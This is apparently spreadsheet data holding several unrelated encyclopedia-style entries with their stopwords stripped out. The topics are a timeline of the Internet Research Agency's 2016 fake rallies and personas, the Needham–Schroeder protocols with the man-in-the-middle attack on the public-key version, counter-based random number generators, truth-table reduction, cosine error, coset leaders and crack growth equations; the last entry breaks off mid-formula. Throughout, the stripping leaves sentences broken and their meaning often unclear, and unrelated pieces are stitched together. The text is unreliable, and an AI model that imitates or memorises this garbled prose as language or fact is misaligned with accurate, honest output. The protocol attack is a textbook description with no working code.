rally protesting death freddie gray attracts large crowds baltimore. ira's blacktivist facebook group promotes organizes event, including reaching local activists. april: purchases first pro-trump "tea party news" instagram account. instagram asks users upload photos hashtag #kids4tru "make patriotic team young trump supporters." april: small group white-power demonstrators hold rally call "rock stone mountain" stone mountain park near stone mountain, georgia. they confronted large group protesters, violent clashes ensue. counterprotest heavily promoted accounts tumblr, twitter, facebook, website blackmatters.com. uses blacktivist account facebook reach out, avail, activist academic barbara williams emerson, daughter hosea williams, help promote protests. afterward, blames anti-racist protesters violence promotes videos shot event. may: second rally held buffalo, york, protesting death india cummings. like april rally, event heavily promoted ira's blacktivist facebook account, including attempted outreach local activists. may: competing rallies held houston alternately protest defend recently opened library islamic knowledge islamic da'wah center. "stop islamization texas" rally organized facebook group "heart texas". facebook posting event encourages participants bring guns. spokesman group converses houston press email declines give name. rally, "save islamic knowledge", organized facebook group "united muslims america" time location. both facebook groups later revealed accounts. may: hires american pose front white house holding sign says, "happy 55th birthday, dear boss." "boss" reference russian oligarch yevgeny prigozhin. june: plans manhattan rally called "march trump" buys facebook promoting event. june: email account allforusa@yahoo.com sends news releases "march trump" rally york city media outlets. june: contacts trump campaign volunteer provide signs "march trump" rally. june: persona "matt skiber" contacts american recruit "march trump" rally. june: group "united muslims america" buys facebook "support hillary, save american muslims" rally. june: ira's "march trump" rally occurs. facebook group lgbt united organizes candlelight vigil pulse nightclub shooting victims orlando, florida. july: ira's translator project grows employees. summer: employees stolen identities four americans open paypal bank accounts conduits funding activities united states. july: "united muslims america", group, orders posters fake clinton quotes promoting sharia law. posters ordered "support hillary, save american muslims" rally organizing. 6–10 july: ira's "don't shoot" facebook group affiliated "don't shoot website organize protest outside paul, minnesota, police headquarters july response july fatal police shooting philando castile. some local activists become suspicious event paul police involved shooting: castile shot anthony police officer nearby falcon heights. local activists contact don't shoot. after pressed supports them, don't shoot agrees move protest anthony police headquarters. concerned local activists investigate urge protesters participate deciding don't shoot "total troll job." don't shoot organizers eventually relinquish control event local organizers, subsequently decline accept money don't shoot. july: "support hillary, save american muslims" rally occurs washington, d.c. rally organized group "united muslims america." july: black lives matter protest rally held dallas. "blue lives matter" counterprotest held across street. blue lives matter protest organized "heart texas" facebook group, controlled ira. july: group buys facebook "down hillary" rally york city. july: ira's blacktivist group organizes rally chicago honor sandra bland first anniversary death. rally held front chicago police department's homan square building. participants pass around petitions calling civilian police accountability council ordinance. july: ira-organized "down hillary" rally held york city. agency sends news releases media outlets using email address joshmilton024@gmail.com. august: ira's "matt skiber" persona contacts real "florida trump" facebook account. "t.w." persona contacts grassroots groups. august: ira's facebook account "stop accuses clinton voter fraud iowa caucuses. they promoting post. groups "florida goes trump" rallies. 8,300 people click sent agency's "being patriotic" facebook page. august: twitter account @march_for_trump hires actress play hillary clinton prison garb someone build cage hold actress. actress cage appear "florida goes trump" rally west palm beach, florida august. august: twitter account @ten_gop claims voter fraud investigated north carolina. 12–18 august: ira's persona "josh milton" communicates trump campaign officials email request trump/pence signs phone numbers campaign affiliates part effort organize pro-trump campaign rallies florida.: august: trump campaign county chair contacts phony email accounts suggest locations rallies. august: buys instagram "florida goes trump" rallies. august: uses joshmilton024@gmail.com email account contact trump campaign official florida. email requests campaign support forthcoming "florida goes trump" rallies. unknown whether campaign official responded. pays person hired build cage "florida goes trump" rally west palm beach, florida. august: trump supporter suggests twitter account "march trump" contact trump campaign official. official emailed agency's joshmilton024@gmail.com account. ira's "matt skiber" persona contacts another trump campaign official facebook. august: "florida goes trump" rallies held across florida. rallies organized russian trolls ira. august: facebook group "securedborders" organizes "citizens refugees" protest rally city council chambers twin falls, idaho. only small number people show three-hour event, likely saturday chambers closed. august: american contacts ira's "being patriotic" account possible september event miami. buys september rally york city. september: facebook group "united muslims america" organizes "safe space muslim neighborhood" rally outside white house, attracting least people. september: sends money american groups fund september rally miami, actress portrayed clinton west palm beach, florida, rally. 20–26 september: blackmattersus, website, recruits activists participate protests police shooting keith lamont scott charlotte, north carolina. pays expenses microphones speakers. september: buys facebook "miners trump" rallies pennsylvania. october: "miners trump" rallies held across pennsylvania. uses techniques organize rallies used "florida goes trump" rallies, including hiring person wear clinton mask prison uniform. october: ira's instagram account "woke blacks" makes post aimed suppressing black voter turnout. october runs popular facebook. ira's back badge facebook group shows badge words "back badge" front police lights caption "community people support brave police officers." october: large rally held charlotte, north carolina, protesting police shooting keith lamont scott. website blackmattersus recruits unwitting local activists organize rally. blackmattersus provides activist bank card rally expenses. november: twitter account @ten_gop alleges "#voterfraud counting tens thousands ineligible mail hillary votes reported broward county, florida." trump retweets november: instagram account "blacktivist" suggests people vote stein instead clinton. november: anti-clinton "texit" rallies held across texas. ira's "heart texas" facebook group organizes rallies around theme</t>
  </si>
  <si>
    <t>Needham–Schroeder protocol</t>
  </si>
  <si>
    <t>needham–schroeder protocol transport protocols intended insecure network, proposed roger needham michael schroeder. these are: needham–schroeder symmetric protocol, based symmetric encryption algorithm. forms basis kerberos protocol. this protocol aims establish session parties network, typically protect communication. needham–schroeder public-key protocol, based public-key cryptography. this protocol intended provide mutual authentication parties communicating network, proposed form insecure. symmetric protocol here, alice {\displaystyle (a)} initiates communication {\displaystyle {\displaystyle server trusted parties. communication: {\displaystyle {\displaystyle identities alice respectively {\displaystyle {k_{as}}} symmetric known {\displaystyle {\displaystyle {\displaystyle {k_{bs}}} symmetric known {\displaystyle {\displaystyle {\displaystyle n_{a}} {\displaystyle n_{b}} nonces generated {\displaystyle {\displaystyle respectively {\displaystyle {k_{ab}}} symmetric, generated key, session session {\displaystyle {\displaystyle protocol specified follows security protocol notation: {\displaystyle a\rightarrow s:\left.a,b,n_{a}\right.} alice sends message server identifying bob, telling server wants communicate bob. {\displaystyle s\rightarrow a:\{n_{a},k_{ab},b,\{k_{ab},a\}_{k_{bs}}\}_{k_{as}}} server generates {\displaystyle {k_{ab}}} sends back alice copy encrypted {\displaystyle {k_{bs}}} alice forward also copy alice. since alice requesting keys several different people, nonce assures alice message fresh server replying particular message inclusion bob's name tells alice share with. {\displaystyle a\rightarrow b:\{k_{ab},a\}_{k_{bs}}} alice forwards decrypt shares server, thus authenticating data. {\displaystyle b\rightarrow a:\{n_{b}\}_{k_{ab}}} sends alice nonce encrypted {\displaystyle {k_{ab}}} show key. {\displaystyle a\rightarrow b:\{n_{b}-1\}_{k_{ab}}} alice performs simple operation nonce, re-encrypts sends back verifying still alive holds key. attacks protocol protocol vulnerable replay attack identified denning sacco). attacker uses older, compromised value {\displaystyle k_{ab}} replay message {\displaystyle \{k_{ab},a\}_{k_{bs}}} bob, accept unable tell fresh. fixing attack this flaw fixed kerberos protocol inclusion timestamp. also fixed nonces described below. beginning protocol: {\displaystyle a\rightarrow b:a} alice sends request. {\displaystyle b\rightarrow a:\{a,\mathbf {n_{b}'} \}_{k_{bs}}} responds nonce encrypted server. {\displaystyle a\rightarrow s:\left.a,b,n_{a},\{a,\mathbf {n_{b}'} \}_{k_{bs}}\right.} alice sends message server identifying bob, telling server wants communicate bob. {\displaystyle s\rightarrow a:\{n_{a},k_{ab},b,\{k_{ab},a,\mathbf {n_{b}'} \}_{k_{bs}}\}_{k_{as}}} note inclusion nonce.the protocol continues described final three steps described original protocol above. note {\displaystyle n_{b}'} different nonce {\displaystyle n_{b}} inclusion nonce prevents replaying compromised version {\displaystyle \{k_{ab},a\}_{k_{bs}}} since message would need form {\displaystyle \{k_{ab},a,\mathbf {n_{b}'} \}_{k_{bs}}} attacker can't forge since {\displaystyle k_{bs}} public-key protocol this assumes public-key encryption algorithm. here, alice {\displaystyle (a)} {\displaystyle (b)} trusted server {\displaystyle (s)} distribute public keys request. these keys are: {\displaystyle k_{pa}} {\displaystyle k_{sa}} respectively public private halves encryption key-pair belonging {\displaystyle {\displaystyle stands "secret key" here) {\displaystyle k_{pb}} {\displaystyle k_{sb}} similar belonging {\displaystyle {\displaystyle k_{ps}} {\displaystyle k_{ss}} similar belonging {\displaystyle (note key-pair used digital signatures, i.e., {\displaystyle k_{ss}} used signing message {\displaystyle k_{ps}} used verification. {\displaystyle k_{ps}} must known {\displaystyle {\displaystyle protocol starts.)the protocol runs follows: {\displaystyle a\rightarrow s:\left.a,b\right.} {\displaystyle requests {\displaystyle public keys {\displaystyle {\displaystyle s\rightarrow a:\{k_{pb},b\}_{k_{ss}}} {\displaystyle responds public {\displaystyle k_{pb}} alongside {\displaystyle identity, signed server authentication purposes. {\displaystyle a\rightarrow b:\{n_{a},a\}_{k_{pb}}} {\displaystyle chooses random {\displaystyle n_{a}} sends {\displaystyle {\displaystyle b\rightarrow s:\left.b,a\right.} {\displaystyle knows wants communicate, {\displaystyle requests {\displaystyle public keys. {\displaystyle s\rightarrow b:\{k_{pa},a\}_{k_{ss}}} server responds. {\displaystyle b\rightarrow a:\{n_{a},n_{b}\}_{k_{pa}}} {\displaystyle chooses random {\displaystyle n_{b}} sends {\displaystyle along {\displaystyle n_{a}} prove ability decrypt {\displaystyle k_{sb}} {\displaystyle a\rightarrow b:\{n_{b}\}_{k_{pb}}} {\displaystyle confirms {\displaystyle n_{b}} {\displaystyle prove ability decrypt {\displaystyle k_{sa}} protocol, {\displaystyle {\displaystyle know other's identities, know {\displaystyle n_{a}} {\displaystyle n_{b}} these nonces known eavesdroppers. attack protocol this protocol vulnerable man-in-the-middle attack. impostor {\displaystyle persuade {\displaystyle initiate session them, relay messages {\displaystyle convince {\displaystyle communicating {\displaystyle ignoring traffic {\displaystyle unchanged, attack runs follows: {\displaystyle a\rightarrow i:\{n_{a},a\}_{k_{pi}}} {\displaystyle sends {\displaystyle n_{a}} {\displaystyle decrypts message {\displaystyle k_{si}} {\displaystyle i\rightarrow b:\{n_{a},a\}_{k_{pb}}} {\displaystyle relays message {\displaystyle pretending {\displaystyle communicating {\displaystyle b\rightarrow i:\{n_{a},n_{b}\}_{k_{pa}}} {\displaystyle sends {\displaystyle n_{b}} {\displaystyle i\rightarrow a:\{n_{a},n_{b}\}_{k_{pa}}} {\displaystyle relays {\displaystyle {\displaystyle a\rightarrow i:\{n_{b}\}_{k_{pi}}} {\displaystyle decrypts {\displaystyle confirms {\displaystyle learns {\displaystyle i\rightarrow b:\{n_{b}\}_{k_{pb}}} {\displaystyle re-encrypts {\displaystyle n_{b}} convinces {\displaystyle decrypted itat attack, {\displaystyle falsely believes {\displaystyle communicating him, {\displaystyle n_{a}} {\displaystyle n_{b}} known {\displaystyle {\displaystyle following example illustrates attack. alice would like contact bank (b). assume impostor successfully convinces bank. consequence uses public instead using public encrypt messages intends send bank. therefore, sends nonce encrypted public decrypts message using private contacts sending nonce encrypted public know message actually sent responds nonce encrypts message public since possession private relay message without knowing content. decrypts message private respond nonce encrypted public decrypts message using private possession nonce therefore, impersonate bank client respectively. fixing man-in-the-middle attack attack first described 1995 paper gavin lowe. paper also describes fixed version scheme, referred needham–schroeder–lowe protocol. involves modification message include responder's identity, replace: {\displaystyle b\rightarrow a:\{n_{a},n_{b}\}_{k_{pa}}} fixed version: {\displaystyle b\rightarrow a:\{n_{a},n_{b},b\}_{k_{pa}}} intruder cannot successfully replay message expecting message containing identity whereas message identity also kerberos otway–rees protocol yahalom wide mouth frog protocol neuman–stubblebine protocol references external links roger needham michael schroeder (1978). "needham-schroeder public key". laboratoire spécification vérification.{{cite web}}: maint: uses authors parameter (link)roger needham michael schroeder (1978). "needham schroeder symmetric key". laboratoire spécification vérification.{{cite web}}: maint: uses authors parameter (link)gavin lowe (1995). "lowe's fixed version needham-schroder public key". laboratoire spécification vérification.{{cite web}}: maint: uses authors parameter (link) explanation man-in-the-middle attack computerphile.</t>
  </si>
  <si>
    <t>Counter-based random number generator (CBRNG)</t>
  </si>
  <si>
    <t>counter-based random number generation (cbrng, also known counter-based pseudo-random number generator, cbprng) kind pseudorandom number generator uses integer counter internal state. background think pseudorandom number generator (prng) function transforms series bits known state state random number. that given prng function initial state {\displaystyle \mathrm {state} _{0}} repeatedly prng generate sequence states random numbers. prngs, mersenne twister, state large, 2048 bytes. prngs, xorshift, {\displaystyle \mathrm {state} _{i}} {\displaystyle \mathrm {num} _{i}} (and state small, bytes, depending size numbers generated). cases, indeed traditional prngs, state evolves unpredictably, want calculate particular {\displaystyle \mathrm {state} _{i}} given initial state {\displaystyle \mathrm {state} _{0}} calculate {\displaystyle \mathrm {state} _{1}} {\displaystyle \mathrm {state} _{2}} running prng {\displaystyle times. such algorithms inherently sequential amenable running parallel machines like multi-core cpus gpus. contrast, counter-based random number generator (cbrng) prng state "evolves" particularly simple manner: {\displaystyle \mathrm {state} _{i}=i} this generate number independently, without knowing result previous call prng. this property make easy cbrng multiple threads gpu. example, generate {\displaystyle random numbers gpu, might spawn {\displaystyle threads {\displaystyle thread calculate {\displaystyle \mathrm {prng} (i)} implementations cbrngs based block ciphers some cbrngs based reduced-strength versions block ciphers. below explain works. when using cryptograhpic block cipher counter mode, generate series blocks random bits. {\displaystyle block calculated encrypting number {\displaystyle using encryption {\displaystyle {\displaystyle \mathrm {block} _{i}=e(i,k)} this similar cbrng, calculate {\displaystyle random number {\displaystyle \mathrm {prng} (i)} indeed, block cipher used cbrng; simply {\displaystyle \mathrm {prng} (i)=e(i,\mathrm {seed} this yields strong, cryptographically-secure source randomness. cryptographically-secure pseudorandom number generators tend slow compared insecure prngs, practice many uses random numbers require degree security. 2011, salmon shaw research introduced cbrngs based reduced-strength versions block ciphers. threefry uses reduced-strength version threefish block cipher. (juvenile fish known "fry".)ars uses reduced-strength version block cipher. ("ars" "aes"; "aes" stands "advanced encryption standard", "ars" stands "advanced randomization system").ars used recent versions intel's math kernel library gets good performance using instructions aes-ni instruction set, specifically accelerate encryption. code implementing threefry, ars, philox (see below) available authors. cbrngs based multiplication addition threefry ars, salmon described third counter-based prng, philox, based wide multiplies; e.g. multiplying 32-bit numbers producing 64-bit number, multiplying 64-bit numbers producing 128-bit number. 2020, philox popular cpus gpus. gpus, nvidia's curand library tensorflow provide implementations philox. cpus, intel's provides implementation. references</t>
  </si>
  <si>
    <t>Truth-table reduction</t>
  </si>
  <si>
    <t>computability theory, truth-table reduction reduction natural numbers another. "tool", weaker turing reduction, since every turing reduction sets performed truth-table reduction, every truth-table reduction performed turing reduction. reason said stronger reducibility turing reducibility, implies turing reducibility. weak truth-table reduction related type reduction named weakens constraints placed truth-table reduction, provides weaker equivalence classification; such, "weak truth-table reduction" actually powerful truth-table reduction "tool", perform reduction performable truth table. turing reduction computes membership single element asking questions membership various elements computation; adaptively determine questions asks based upon answers previous questions. contrast, truth-table reduction weak truth-table reduction must present (finitely many) oracle queries time. truth-table reduction, reduction also gives boolean function truth table) which, given answers queries, produce final answer reduction. weak truth-table reduction, reduction uses oracle answers basis computation depend given answers questions oracle. equivalently, weak truth-table reduction turing reduction reduction bounded computable function. reason, sometimes referred bounded turing (bt) reductions rather weak truth-table (wtt) reductions. properties every truth-table reduction turing reduction, truth-table reducible also turing reducible considering also one-one reducibility, many-one reducibility weak truth-table reducibility, {\displaystyle a\leq _{1}b\rightarrow a\leq _{m}b\rightarrow a\leq _{tt}b\rightarrow a\leq _{wtt}b\rightarrow a\leq _{t}b} words, one-one reducibility implies many-one reducibility, implies truth-table reducibility, turn implies weak truth-table reducibility, turn implies turing reducibility. furthermore, truth-table reducible turing reducible total functional {\displaystyle 2^{\omega forward direction trivial reverse direction suppose {\displaystyle \gamma total computable functional. build truth-table computing a(n) simply search number binary strings {\displaystyle \sigma length {\displaystyle \gamma ^{\sigma }(n)} converges. such must exist kőnig's lemma since {\displaystyle \gamma must total paths {\displaystyle 2^{&lt;\omega given simple matter find unique truth-table gives {\displaystyle \gamma ^{\sigma }(n)} applied {\displaystyle \sigma forward direction fails weak truth-table reducibility. references rogers, jr., 1967. theory recursive functions effective computability, second edition 1987, press. isbn 0-262-68052-1 (paperback), isbn 0-07-053522-1</t>
  </si>
  <si>
    <t>Cosine error</t>
  </si>
  <si>
    <t>cosine error occurs measuring instrument readings user instrument realize vector instrument measuring coincide vector user wishes measure. often lack coincidence subtle (with vectors almost coinciding), user notice notices fails appreciate importance). simple example taking measurement across rectangle failing realize line measurement quite parallel edges, slightly diagonal. rather measuring desired vector case, orthogonal width), instrument measuring hypotenuse triangle desired vector fact legs. cosine triangle correlates much error exists measurement (hence name cosine error). thus user might measure block metal come away width 208.92 true width 208.91 difference matters subsequent machining. although many workers might term "cosine error" name mistake (instead calling "failing measure squarely"), underlying concept same. example, novice carpentry might make kind mistake tape measure slightly askew, whereas master carpenter would know ingrained experience measure squarely.a context potential cosine error must often considered indicator (distance amplifying instrument).cosine error also affect laser interferometry.another context potential cosine error draws attention lidar traffic enforcement radar traffic enforcement, drivers assert speed measurement error lidar radar signal emitted direction directly along line travel. (cosine error always reduces measured speed, thus favoring motorist.) extent true equipment prone error, opposed successfully compensating angles automatically, argued traffic courts. demonstrably true missile-guiding radars capable accurately measuring oblique movements enemy aircraft variety conditions, degree traffic enforcement radar lidar succeeds problem challenged defendants, speak cosine effect cosine error effect. mitigation longer length instrument, easier control cosine error. instrument small, optical alignment techniques used reduce cosine error. references</t>
  </si>
  <si>
    <t>Coset leader</t>
  </si>
  <si>
    <t>coding theory, coset leader word minimum weight particular coset word lowest amount non-zero entries. sometimes several words equal minimum weight coset, case, words chosen coset leader. coset leaders used construction standard array linear code, used decode received vectors. received vector decoded message coset leader coset leaders also used construct fast decoding strategy. coset leader calculate syndrome uh′. when receive evaluate find matching syndrome. corresponding coset leader likely error pattern assume codeword sent. references hill, raymond (1986). first course coding theory. oxford applied mathematics computing science series. oxford university press. isbn 978-0-19-853803-5.</t>
  </si>
  <si>
    <t>Crack growth equation</t>
  </si>
  <si>
    <t>crack growth equation used calculating size fatigue crack growing cyclic loads. growth fatigue cracks result catastrophic failure, particularly case aircraft. crack growth equation used ensure safety, design phase operation, predicting size cracks. critical structure, loads recorded used predict size cracks ensure maintenance retirement occurs prior cracks failing. fatigue life divided initiation period crack growth period. crack growth equations used predict crack size starting given initial flaw typically based experimental data obtained constant amplitude fatigue tests. earliest crack growth equations based stress intensity factor range load cycle {\displaystyle \delta paris–erdogan equation {\displaystyle \over dn}=c(\delta k)^{m}} {\displaystyle crack length {\displaystyle {\rm {d}}a/{\rm {d}}n} fatigue crack growth single load cycle {\displaystyle variety crack growth equations similar paris–erdogan equation developed include factors affect crack growth rate stress ratio, overloads load history effects. stress intensity range calculated maximum minimum stress intensity cycle {\displaystyle \delta k=k_{\text{max}}-k_{\text{min}}} geometry factor {\displaystyle \beta used relate field stress {\displaystyle \sigma crack stress intensity using {\displaystyle k=\beta \sigma {\sqrt {\pi a}}} .there standard references containing geometry factors many different configurations. history crack propagation equations many crack propagation equations proposed years improve prediction accuracy incorporate variety effects. works head, frost dugdale, mcevily illg, fatigue crack-growth behaviour laid foundation topic. general form crack propagation equations expressed {\displaystyle \over dn}=f(\delta \sigma ,a,c_{i}),} where, crack length denoted {\displaystyle number cycles load applied given {\displaystyle stress range {\displaystyle \delta \sigma material parameters {\displaystyle c_{i}} symmetrical configurations, length crack line symmetry defined {\displaystyle half total crack length {\displaystyle crack growth equations form {\displaystyle da/dn} true differential equation model process crack growth continuous manner throughout loading cycle. such, separate cycle counting identification algorithms commonly used rainflow-counting algorithm, required identify maximum minimum values cycle. although developed stress/strain-life methods rainflow counting also shown work crack growth. there small number true derivative fatigue crack growth equations also developed. factors affecting crack growth rate regimes figure shows typical plot rate crack growth function alternating stress intensity crack driving force {\displaystyle \delta plotted scales. crack growth rate behaviour respect alternating stress intensity explained different regimes (see, figure follows regime growth rates, variations microstructure, mean stress load ratio), environment significant effects crack propagation rates. observed load ratios growth rate sensitive microstructure strength materials sensitive load ratio.regime mid-range growth rates, variations microstructure, mean stress load ratio), thickness, environment significant effects crack propagation rates. regime high growth rates, crack propagation highly sensitive variations microstructure, mean stress load ratio), thickness. environmental effects relatively less influence. stress ratio effect cycles higher stress ratio {\displaystyle r=k_{\text{min}}}/{k_{\text{max}}\equiv p_{\text{min}}/{p_{\text{max}}}} increased rate crack growth. this effect often explained using crack closure concept describes observation crack faces remain contact loads zero. this reduces effective stress intensity factor range fatigue crack growth rate. sequence effects {\displaystyle da/dn} equation gives rate growth single cycle, loading constant amplitude, changes loading lead temporary increases decreases rate growth. additional equations developed deal cases. rate growth retarded overload occurs loading sequence. these loads generate plastic zone delay rate growth. notable equations modelling delays occurring crack grows overload region are: wheeler model (1972) {\displaystyle \left({\frac {da}{dn}}\right)_{\text{va}}=\beta \left({\frac {da}{dn}}\right)_{\text{ca}}} {\displaystyle \beta =\left({\frac {r_{\text{pi}}}{r_{\text{max}}}}\right)^{k}} {\displaystyle r_{\text{pi}}} plastic zone corresponding cycle occurs post overload {\displaystyle r_{\text{max}}} distance crack extent plastic zone overload. willenborg model crack growth equations threshold equation predict crack growth rate near threshold region, following relation used {\displaystyle \over dn}=a\left(\delta k-\delta k_{\text{th}}\right)^{p}.} paris–erdoğan equation predict crack growth rate intermediate regime, paris–erdoğan equation used {\displaystyle \over dn}=c\left(\delta k\right)^{m}.} forman equation 1967, forman proposed following relation account increased growth rates stress ratio approaching fracture toughness {\displaystyle k_{\text{c}}} {\displaystyle \over dn}={\frac {c(\delta k)^{n}}{(1-r)k_{\text{c}}-\delta k}}} mcevily–groeger equation mcevily groeger proposed following power-law relationship considers effects high values {\displaystyle \delta {\displaystyle \over dn}=a(\delta k-\delta k_{\text{th}})^{2}{\big [}1+{\frac {\delta k}{k_{\text{ic}}-k_{\text{max}}}}{\big nasgro equation nasgro equation used crack growth programs afgrow, fastran nasgro software. general equation covers lower growth rate near threshold {\displaystyle \delta k_{\text{th}}} increased growth rate approaching fracture toughness crit {\displaystyle k_{\text{crit}}} well allowing mean stress effect including stress ratio {\displaystyle nasgro equation crit {\displaystyle {\frac {da}{dn}}=c\left[\left({\frac {1-f}{1-r}}\right)\delta k\right]^{n}{\left(1-{\frac {\delta k_{\text{th}}}{\delta k}}\right)^{p} \over \left(1-{\frac {k_{\max }}{k_{\text{crit}}}}\right)^{q}}} {\displaystyle {\displaystyle {\displaystyle {\displaystyle {\displaystyle {\displaystyle \delta k_{\text{th}}} crit {\displaystyle k_{\text{crit}}} equation coefficients. mcclintock equation 1967, mcclintock developed equation upper limit crack growth based cyclic crack opening displacement ctod {\displaystyle \delta {\text{ctod}}} ctod {\displaystyle \over dn}\propto \delta {\text{ctod}}\approx \beta {(\delta k)^{2} \over {2\sigma _{0}e'}}} {\displaystyle \sigma _{0}} flow stress, {\displaystyle young's modulus {\displaystyle \beta constant typically range 0.1–0.5. walker equation account stress ratio effect, walker suggested modified form paris–erdogan equation {\displaystyle \over dn}=c{\big (}{\overline {\delta k}}{\big )}^{m}=c{\bigg (}{\frac {\delta k}{(1-r)^{1-\gamma }}}{\bigg )}^{m}=c{\big (}k_{\text{max}}(1-r)^{\gamma }{\big )}^{m}} where, {\displaystyle \gamma material parameter represents influence stress ratio fatigue crack growth rate. typically, {\displaystyle \gamma takes value around {\displaystyle 0.5} vary {\displaystyle 0.3-1.0} general, assumed compressive portion loading cycle {\displaystyle {\big (}r&lt;0{\big effect crack growth considering {\displaystyle \gamma =0,} gives {\displaystyle {\overline {\delta k}}=k_{\text{max}}.} this physically explained considering crack closes zero load behave like crack compressive loads. ductile materials like man-ten steel compressive loading contribute crack growth according 0.22 {\displaystyle \gamma =0.22} elber equation elber modified paris–erdogan equation allow crack closure introduction opening stress intensity level {\displaystyle k_{\text{op}}} contact occurs. below level movement crack hence growth. this effect used explain stress ratio effect increased rate growth observed short cracks. elber's equation {\displaystyle \delta k_{\text{eff}}=k_{\text{max}}-k_{\text{op}}} {\displaystyle \over dn}=c(\delta k_{\text{eff}})^{m}} ductile brittle materials equation general form fatigue-crack growth rate ductile brittle materials given {\displaystyle \over dn}\propto (k_{\text{max}})^{n}(\delta k)^{p},} where, {\displaystyle {\displaystyle material parameters. based different crack-advance crack-tip shielding mechanisms metals, ceramics, intermetallics, observed fatigue crack growth rate metals significantly dependent {\displaystyle \delta term, ceramics {\displaystyle k_{\text{max}}} intermetallics almost similar dependence {\displaystyle \delta {\displaystyle k_{\text{max}}} terms. prediction fatigue life computer programs there many computer programs implement crack growth equations nasgro, afgrow fastran. addition, also programs implement probabilistic approach crack growth calculate probability failure throughout life component.crack growth programs grow crack initial flaw size exceeds fracture toughness material fails. because fracture toughness depends boundary conditions, fracture toughness change plane strain conditions semi-circular surface crack plane stress conditions crack. fracture toughness plane stress conditions typically twice large plane strain. however, rapid rate growth crack near life, variations fracture toughness significantly alter life component. crack growth programs typically provide choice cycle counting methods extract cycle extremes geometry factors select shape crack applied loading crack growth equation acceleration/retardation models material properties yield strength fracture toughness analytical solution stress intensity factor given {\displaystyle k=\beta \sigma {\sqrt {\pi a}},} {\displaystyle \sigma applied uniform tensile stress acting specimen direction perpendicular crack plane, {\displaystyle crack length {\displaystyle \beta dimensionless parameter depends geometry specimen. alternating stress intensity becomes {\displaystyle {\begin{aligned}\delta k&amp;={\begin{cases}\beta (\sigma _{\text{max}}-\sigma _{\text{min}}){\sqrt {\pi a}}=\beta \delta \sigma {\sqrt {\pi a}},\qquad r\geq 0\\\beta \sigma _{\text{max}}{\sqrt {\pi a}},\qquad r&lt;0\end{cases}},\end{aligned}}} {\displaystyle \delta \sigma range cyclic stress amplitude. assuming initial crack size {\displaystyle a_{0}} critical crack size {\displaystyle a_{c}} specimen fails computed using {\displaystyle {\big (}k=k_{\text{max}}=k_{\text{ic}}{\big {\displaystyle {\begin{aligned}k_{\text{ic}}&amp;=\beta \sigma _{\text{max}}{\sqrt {\pi a_{c}}},\\\rightarrow a_{c}&amp;={\frac {1}{\pi }}{\bigg (}{\frac {k_{\text{ic}}}{\beta \sigma _{\text{max}}}}{\bigg )}^{2}.\end{aligned}}} equation {\displaystyle a_{c}} implicit nature solved numerically necessary. case {\displaystyle r\geq 0.7,} crack closure negligible effect crack growth rate paris–erdogan equation used compute fatigue life specimen reaches critical crack size {\displaystyle a_{c}} {\displaystyle {\begin{aligned}{da \over dn}&amp;=c(\delta k)^{m}=c{\bigg (}\beta \delta \sigma {\sqrt {\pi a}}{\bigg )}^{m},\\\rightarrow n_{f}&amp;={\frac {1}{({\sqrt {\pi }}\delta \sigma )^{m}}}\int _{a_{0}}^{a_{c}}{\frac {da}{(c{\sqrt {a}}\beta )^{m}}}.\end{aligned}}} crack growth model constant value {\displaystyle \beta griffith-irwin crack growth model center crack length {\displaystyle infinite sheet shown figure {\displaystyle \beta independent crack length. also, {\displaystyle considered independent crack length. assuming constant {\displaystyle \beta ={\text{constant}},} integral simplifies {\displaystyle n_{f}={\frac {1}{c({\sqrt {\pi }}\beta \delta \sigma )^{m}}}\int _{a_{0}}^{a_{c}}{\frac {da}{({\sqrt {a}})^{m}}},} integrating expression {\displaystyle m\neq {\displaystyle m=2} cases, total number load cycles {\displaystyle n_{f}} given {\displaystyle {\begin{aligned}n_{f}&amp;={\frac {2}{(m-2)c({\sqrt {\pi }}\beta \delta \sigma )^{m}}}{\bigg [}{\frac {1}{(a_{0})^{\frac {m-2}{2}}}}-{\frac {1}{(a_{c})^{\frac {m-2}{2}}}}{\bigg ]},\qquad m\neq 2,\\n_{f}&amp;={\frac {1}{\pi c(\beta \delta \sigma )^{2}}}\ln {\frac {a_{c}}{a_{0}}},\qquad m=2.\end{aligned}}} now, {\displaystyle m&gt;2} critical crack size large comparison initial crack size {\displaystyle {\big (}a_{c}&gt;&gt;a_{0}{\big give {\displaystyle n_{f}={\frac {2}{(m-2)c({\sqrt {\pi }}\delta \sigma \beta )^{m}}}(a_{0})^{\frac {2-m}{2}}.} analytical expressions total number load cycles fracture {\displaystyle {\big (}n_{f}{\big obtained assuming constant {\displaystyle y={\text{constant}}} cases, {\displaystyle \beta dependent crack size single edge notch tension (sent), center cracked tension (cct) geometries, numerical integration used compute {\displaystyle n_{f}} case {\displaystyle r&lt;0.7,} crack closure phenomenon effect crack growth rate invoke walker equation compute fatigue life specimen reaches critical crack size {\displaystyle a_{c}} {\displaystyle {\begin{aligned}{da \over dn}&amp;=c{\bigg (}{\frac {\delta k}{(1-r)^{1-\gamma }}}{\bigg )}^{m}={\frac {c}{(1-r)^{m(1-\gamma )}}}{\bigg (}\beta \delta \sigma {\sqrt {\pi a}}{\bigg )}^{m},\\\rightarrow n_{f}&amp;={\frac {(1-r)^{m(1-\gamma )}}{({\sqrt {\pi }}\delta \sigma )^{m}}}\int _{a_{0}}^{a_{c}}{\frac {da}{(c{\sqrt {a}}\beta )^{m}}}.\end{aligned}}} numerical calculation this scheme useful {\displaystyle \beta dependent crack size {\displaystyle initial crack size considered {\displaystyle a_{0}} stress intensity factor current crack size {\displaystyle computed using maximum applied stress {\displaystyle {\begin{aligned}k_{\text{max}}&amp;=\beta \sigma _{\text{max}}{\sqrt {\pi a}}.\end{aligned}}} {\displaystyle k_{\text{max}}} less fracture toughness {\displaystyle k_{\text{ic}}} crack reached critical size {\displaystyle a_{c}} simulation continued current crack size calculate alternating stress intensity {\displaystyle \delta k=\beta \delta \sigma {\sqrt {\pi a}}.} now, substituting stress intensity factor paris–erdogan equation, increment crack size {\displaystyle \delta computed {\displaystyle \delta a=c(\delta k)^{m}\delta {\displaystyle \delta cycle step size. crack size becomes {\displaystyle a_{i+1}=a_{i}+\delta index {\displaystyle refers current iteration step. crack size used calculate stress intensity maximum applied stress next iteration. this iterative process continued {\displaystyle k_{\text{max}}\geq k_{\text{ic}}.} once failure criterion met, simulation stopped. schematic representation fatigue life prediction process shown figure example stress intensity factor sent specimen (see, figure fatigue crack growth given 0.265 0.857 0.265 {\displaystyle {\begin{aligned}k_{i}&amp;=\beta \sigma {\sqrt {\pi a}}=\sigma {\sqrt {\pi a}}{\bigg [}0.265{\bigg [}1-{\frac 